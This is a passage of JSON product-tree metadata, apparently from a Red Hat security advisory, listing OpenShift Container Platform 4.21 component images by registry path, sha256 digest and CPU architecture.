"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:119755cb13662c0badea9909769b6d1b68e39ae301528e2d02033fadafb3ada7_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:119755cb13662c0badea9909769b6d1b68e39ae301528e2d02033fadafb3ada7_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:4ab8f0bae412a02716488ba4cdb98484f1ce8a02af2a57268325ec3fcf71a68e_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:4ab8f0bae412a02716488ba4cdb98484f1ce8a02af2a57268325ec3fcf71a68e_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:4ab8f0bae412a02716488ba4cdb98484f1ce8a02af2a57268325ec3fcf71a68e_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:4fb910203a55e68b0808e3bc0ff4810415cdd1bc11797419fbb7fdbc207902bd_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:4fb910203a55e68b0808e3bc0ff4810415cdd1bc11797419fbb7fdbc207902bd_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:4fb910203a55e68b0808e3bc0ff4810415cdd1bc11797419fbb7fdbc207902bd_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:5f60cd059fc10cc44b69ae22f112a1ee417caa80c1cc24244305b4a0d9cd3770_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:5f60cd059fc10cc44b69ae22f112a1ee417caa80c1cc24244305b4a0d9cd3770_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:5f60cd059fc10cc44b69ae22f112a1ee417caa80c1cc24244305b4a0d9cd3770_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:243198fd33b89359085ce6a81105a4f0994b4a4108bf14939c79925e22b21f10_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:243198fd33b89359085ce6a81105a4f0994b4a4108bf14939c79925e22b21f10_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:243198fd33b89359085ce6a81105a4f0994b4a4108bf14939c79925e22b21f10_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:5dc47b4cb13f136785a96251bdc04660378782ecb2402c3b97088ae1e06bcc81_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:5dc47b4cb13f136785a96251bdc04660378782ecb2402c3b97088ae1e06bcc81_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:5dc47b4cb13f136785a96251bdc04660378782ecb2402c3b97088ae1e06bcc81_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:671255acd29d7a45fbfe17fb5108065472197ba6ad1edaf57dd071bc471ab8c6_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:671255acd29d7a45fbfe17fb5108065472197ba6ad1edaf57dd071bc471ab8c6_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:671255acd29d7a45fbfe17fb5108065472197ba6ad1edaf57dd071bc471ab8c6_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:ca2c0901f0ec1756344b5029e2912d6d7bd60c91015dbdf8b9ed704a2f59f6c0_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:ca2c0901f0ec1756344b5029e2912d6d7bd60c91015dbdf8b9ed704a2f59f6c0_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:ca2c0901f0ec1756344b5029e2912d6d7bd60c91015dbdf8b9ed704a2f59f6c0_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:83a3fd64a6dc406e9035cdd58a98f7e745919ae3b44d9fbe4bc1087f36ace997_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:83a3fd64a6dc406e9035cdd58a98f7e745919ae3b44d9fbe4bc1087f36ace997_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:83a3fd64a6dc406e9035cdd58a98f7e745919ae3b44d9fbe4bc1087f36ace997_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:87de8c9f5d7d591609208ab4332efa976b4ed303dd18f879374f2d047c9b8c9f_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:87de8c9f5d7d591609208ab4332efa976b4ed303dd18f879374f2d047c9b8c9f_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:87de8c9f5d7d591609208ab4332efa976b4ed303dd18f879374f2d047c9b8c9f_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:bb4acaac924d3e5b90306927a9d1e848c656f2a3e3572f59c163cbdab2f96980_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:bb4acaac924d3e5b90306927a9d1e848c656f2a3e3572f59c163cbdab2f96980_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:bb4acaac924d3e5b90306927a9d1e848c656f2a3e3572f59c163cbdab2f96980_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:f70ed49c97be6bec1394cc8a7476bdc694d2a9222fcd63079bf6e27af8f6b465_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:f70ed49c97be6bec1394cc8a7476bdc694d2a9222fcd63079bf6e27af8f6b465_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:f70ed49c97be6bec1394cc8a7476bdc694d2a9222fcd63079bf6e27af8f6b465_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:00f27b950067e2221e7ec3d2b050939239d5521352a2496e152092d043588190_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:00f27b950067e2221e7ec3d2b050939239d5521352a2496e152092d043588190_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:00f27b950067e2221e7ec3d2b050939239d5521352a2496e152092d043588190_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:2973ce1c3d9df0e94568fdc45b90f86d6d7c65fa3bf6c319219b9e213a684101_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:2973ce1c3d9df0e94568fdc45b90f86d6d7c65fa3bf6c319219b9e213a684101_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:2973ce1c3d9df0e94568fdc45b90f86d6d7c65fa3bf6c319219b9e213a684101_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:3901b52ff993fc282bbea1b9b809a75da85fa70fc4d85690fed3d23922218722_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:3901b52ff993fc282bbea1b9b809a75da85fa70fc4d85690fed3d23922218722_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:3901b52ff993fc282bbea1b9b809a75da85fa70fc4d85690fed3d23922218722_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:71eedc67a3a1641b7dda0b7974b82dee449e7ee4efa5a4745042efbf32795898_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:71eedc67a3a1641b7dda0b7974b82dee449e7ee4efa5a4745042efbf32795898_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:71eedc67a3a1641b7dda0b7974b82dee449e7ee4efa5a4745042efbf32795898_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:7d76c0f6f94b38c24f37c80c88f4c343792a63765d741c3c8c6c930cdb949349_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:7d76c0f6f94b38c24f37c80c88f4c343792a63765d741c3c8c6c930cdb949349_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:7d76c0f6f94b38c24f37c80c88f4c343792a63765d741c3c8c6c930cdb949349_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:7effee7b85d83c6fbf210c0b7dc5bc4bf9d1a218c2e0d847c7bfd4b205dd8a74_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:7effee7b85d83c6fbf210c0b7dc5bc4bf9d1a218c2e0d847c7bfd4b205dd8a74_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:7effee7b85d83c6fbf210c0b7dc5bc4bf9d1a218c2e0d847c7bfd4b205dd8a74_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:d3971e090065233100d9c842b116a8abed46852cf16fe23c6a02601c6898471d_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:d3971e090065233100d9c842b116a8abed46852cf16fe23c6a02601c6898471d_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:d3971e090065233100d9c842b116a8abed46852cf16fe23c6a02601c6898471d_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:f54b6da4bb411f5fdeec587f959111281be96f9652076c9fe913dde3e0942216_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:f54b6da4bb411f5fdeec587f959111281be96f9652076c9fe913dde3e0942216_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:f54b6da4bb411f5fdeec587f959111281be96f9652076c9fe913dde3e0942216_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:01dcdeb5283cdeb0ddba574048f39ef56f2a2f548efffffd3984bbf29d20cd81_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:01dcdeb5283cdeb0ddba574048f39ef56f2a2f548efffffd3984bbf29d20cd81_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:01dcdeb5283cdeb0ddba574048f39ef56f2a2f548efffffd3984bbf29d20cd81_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:17508a3579649b2f104c177ff20decf1792214307cdfd81679075afd2287f266_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:17508a3579649b2f104c177ff20decf1792214307cdfd81679075afd2287f266_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:17508a3579649b2f104c177ff20decf1792214307cdfd81679075afd2287f266_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:203b0b4d925bd77ae87f65636286e232186d8d4583b4db054cfcd8a6bb5550c7_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:203b0b4d925bd77ae87f65636286e232186d8d4583b4db054cfcd8a6bb5550c7_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:203b0b4d925bd77ae87f65636286e232186d8d4583b4db054cfcd8a6bb5550c7_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:ac0a240e28bcd757bf17b7c394ce29039bce95933ef903512257fc77d5a563da_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:ac0a240e28bcd757bf17b7c394ce29039bce95933ef903512257fc77d5a563da_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:ac0a240e28bcd757bf17b7c394ce29039bce95933ef903512257fc77d5a563da_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:0b4342a45f1bff331108e760c7022aa89baa9f57203638560500cbb2c223e8da_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:0b4342a45f1bff331108e760c7022aa89baa9f57203638560500cbb2c223e8da_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:0b4342a45f1bff331108e760c7022aa89baa9f57203638560500cbb2c223e8da_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:2bd38ca9b26cfa801fa8953d3498ddeada823e50f421f9061dbbf1ba77d72d18_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:2bd38ca9b26cfa801fa8953d3498ddeada823e50f421f9061dbbf1ba77d72d18_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:2bd38ca9b26cfa801fa8953d3498ddeada823e50f421f9061dbbf1ba77d72d18_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:d23fea2bd893beb50feb76ea14c8674a721085694bc584f702f8ded1dc1aa7b1_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:d23fea2bd893beb50feb76ea14c8674a721085694bc584f702f8ded1dc1aa7b1_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:d23fea2bd893beb50feb76ea14c8674a721085694bc584f702f8ded1dc1aa7b1_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:da24b2db5c1cf99b9910abba7846c7301e1ae4fa9fa5e99e639b7840d1d53a81_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:da24b2db5c1cf99b9910abba7846c7301e1ae4fa9fa5e99e639b7840d1d53a81_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:da24b2db5c1cf99b9910abba7846c7301e1ae4fa9fa5e99e639b7840d1d53a81_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:12f808f0c0a7103699e60487369cc7e4938098c9e8844c192e957fcd564f7fd3_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:12f808f0c0a7103699e60487369cc7e4938098c9e8844c192e957fcd564f7fd3_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:12f808f0c0a7103699e60487369cc7e4938098c9e8844c192e957fcd564f7fd3_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:8ea2c228f0d91c6e1d86cf11676e9e10d55785850aacc3d5c26c88838c6e5e6b_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:8ea2c228f0d91c6e1d86cf11676e9e10d55785850aacc3d5c26c88838c6e5e6b_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:8ea2c228f0d91c6e1d86cf11676e9e10d55785850aacc3d5c26c88838c6e5e6b_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:c0936e2cd743f59b3b7d49c8a915503f06721578ad44f3884f547278637eb83e_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:c0936e2cd743f59b3b7d49c8a915503f06721578ad44f3884f547278637eb83e_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:c0936e2cd743f59b3b7d49c8a915503f06721578ad44f3884f547278637eb83e_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:c9db60882b0128f4590e519fe1743e24016c39610141e62aa0433c2ec0a007b8_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:c9db60882b0128f4590e519fe1743e24016c39610141e62aa0433c2ec0a007b8_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:c9db60882b0128f4590e519fe1743e24016c39610141e62aa0433c2ec0a007b8_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:1c12e3a479c1b9151399bd607251cd363c53d258aebbde16d9f445bf762b5c5e_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:1c12e3a479c1b9151399bd607251cd363c53d258aebbde16d9f445bf762b5c5e_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:1c12e3a479c1b9151399bd607251cd363c53d258aebbde16d9f445bf762b5c5e_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:55cb1bfa110d67c2452259e6b4a2158b8f6e7c4bba9e7dfd661e0dea37ff2e25_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:55cb1bfa110d67c2452259e6b4a2158b8f6e7c4bba9e7dfd661e0dea37ff2e25_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:55cb1bfa110d67c2452259e6b4a2158b8f6e7c4bba9e7dfd661e0dea37ff2e25_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:99fc6f28b728c227ac8fb8b0dce24369168c7c1aa470778953b30e7fb0ecd1dc_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:99fc6f28b728c227ac8fb8b0dce24369168c7c1aa470778953b30e7fb0ecd1dc_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:99fc6f28b728c227ac8fb8b0dce24369168c7c1aa470778953b30e7fb0ecd1dc_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:e77e4ba2ca054937f43d56ea54ed53df29fb55179879064a83ab078660c6c9f7_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:e77e4ba2ca054937f43d56ea54ed53df29fb55179879064a83ab078660c6c9f7_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:e77e4ba2ca054937f43d56ea54ed53df29fb55179879064a83ab078660c6c9f7_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-console-rhel9@sha256:9c77d337f175a9ae409943abbbe952a6c738f6ea7f35f0108b338501f7454bb4_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-console-rhel9@sha256:9c77d337f175a9ae409943abbbe952a6c738f6ea7f35f0108b338501f7454bb4_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-console-rhel9@sha256:9c77d337f175a9ae409943abbbe952a6c738f6ea7f35f0108b338501f7454bb4_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-console-rhel9@sha256:aca9a52fb5a895ab113232b967887b942882b83e0e8902c269214df95173a386_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-console-rhel9@sha256:aca9a52fb5a895ab113232b967887b942882b83e0e8902c269214df95173a386_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-console-rhel9@sha256:aca9a52fb5a895ab113232b967887b942882b83e0e8902c269214df95173a386_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-console-rhel9@sha256:f74d2a1cde5b1ad9da59a8ecd9b81f86aae535ec800c116bb3d160fb81961ba4_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-console-rhel9@sha256:f74d2a1cde5b1ad9da59a8ecd9b81f86aae535ec800c116bb3d160fb81961ba4_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-console-rhel9@sha256:f74d2a1cde5b1ad9da59a8ecd9b81f86aae535ec800c116bb3d160fb81961ba4_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-console-rhel9@sha256:fdcf40f0405b01b5e02f2ec83b5bdbeb374294f0041a97007d430c3c4109573c_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-console-rhel9@sha256:fdcf40f0405b01b5e02f2ec83b5bdbeb374294f0041a97007d430c3c4109573c_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-console-rhel9@sha256:fdcf40f0405b01b5e02f2ec83b5bdbeb374294f0041a97007d430c3c4109573c_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:64d0b8bb7edbe154290b673c995576311b6d0afa28c43503788796c5f7e6451e_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:64d0b8bb7edbe154290b673c995576311b6d0afa28c43503788796c5f7e6451e_arm64"
},
